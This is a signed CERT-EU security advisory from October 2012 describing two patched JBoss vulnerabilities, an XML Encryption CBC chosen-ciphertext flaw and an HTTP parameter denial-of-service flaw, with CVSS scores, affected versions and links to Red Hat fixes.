-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Reference: CERT-EU Security Advisory 2012-0123 Title: Multiple Updates on JBOSS Products [1] Version history: 16.10.2012 Initial publication Summary ======= 1) An update for the JBoss Web Services component in JBoss Enterprise SOA Platform 5.3.0 that fixes one security issue is now available from the Red Hat Customer Portal. [1] CVE-2011-1096 CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) [2] 2) JBoss Operations Network 3.1.1, which fixes one security issue, several bugs, and adds enhancements, is now available from the Red Hat Customer Portal. CVE-2012-0022 CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) [4] Vulnerable systems ================== 1) JBoss Enterprise SOA Platform 5.3.0 2) JBoss Operations Network 3.1.0 Original Details ================ 1) An attack technique was found against the W3C XML Encryption Standard when block ciphers were used in cipher-block chaining (CBC) mode. A remote attacker could use this flaw to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram by examining the differences between SOAP (Simple Object Access Protocol) responses sent from JBoss Web Services. (CVE-2011-1096) 2) It was found that JBoss Web did not handle large numbers of parameters and large parameter values efficiently. A remote attacker could make JBoss Web use an excessive amount of CPU time by sending an HTTP request containing a large number of parameters or large parameter values. This update introduces limits on the number of parameters and headers processed per request to address this issue. The default limit is 512 for parameters and 128 for headers. These defaults can be changed by setting the org.apache.tomcat.util.http.Parameters.MAX_COUNT and org.apache.tomcat.util.http.MimeHeaders.MAX_COUNT system properties in "jbossas/server/[PROFILE]/deploy/properties-service.xml". (CVE-2012-0022) What can you do? ================ A fix is available [1,3]. What to tell your users? ======================== N/A More information ================ [1] https://rhn.redhat.com/errata/RHSA-2012-1330.html [2] https://access.redhat.com/security/cve/CVE-2011-1096 [3] https://rhn.redhat.com/errata/RHSA-2012-1331.html [4] https://access.redhat.com/security/cve/CVE-2012-0022 [5] http://cve.mitre.org/ Best regards, CERT-EU Pre-configuration Team (http://cert.europa.eu) Phone: +32.2.2990005 / e-mail: cert-eu@ec.europa.eu PGP KeyID 0x46AC4383 FP: 9011 6BE9 D642 DD93 8348 DAFA 27A4 06CA 46AC 4383 Privacy Statement: http://cert.europa.eu/cert/plainedition/en/cert_privacy.html -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iQIcBAEBAgAGBQJQfXRhAAoJEPpzpNLI8SVoGXoP/0EjDwfT3DKk5d6WuglnmTv4 ruH02a0PB9ZP2hJpkiAB34pL3mBfvXsQbBAJxwGD7hjkv2NPjgjgFH9SVO+8DZEX XModo8cf7MxoRNY4HBV0tUJpIrj3g9FsbazC2iNNAxu5niNiPxYw+2dr15y85RFp VJnW3J7CFxfAiihB+HWBBMq1Uz1xJzXGZh/fRw1QYt9JGMX4dNLtIxls0ckZCRNw Q1+4pjT+qR3oEeh9kzBQmrD+Esb9TXkWbtlWQiVl26hUfz/tIGvxyUl9sG+9NEiS r7rnUsUIhKKhQb8SqnB3zASiebpjLf7uMkBrTAAz1NB/wJTCGW6QTzAHS4tVSE4A RvhM6tesKMJtDXcFr95VuMSV+55KaEAe6aENSYwVdpb3f6p7FvxnrmFSOAm23BvV ymgv7kI3pkbjmbWxkceFJKJF1P0DygefOxhR6Mr1GkwzIF8mU2C+WSf9Qo6MxvGF xi6eWI/DXOgWQwrN3GoG60TkhU4cCre5lZ3p5s8DJLrImq41nCnKA904CV3PpiXs 4X2CUZyNZgUFTYEtnOXBAhmT9sbp/yQkKxWRH6qJ+QnR7dPvTzwk8LglLz3tj7zA +f5AXUU9ha6hKhxQ6iZ7AVrch72ATgYYbJOL4umLV1AG2288+G6WWFXUDa/bDP7z eoeW+E4IJP3o4Pk0i0pb =ouFb -----END PGP SIGNATURE-----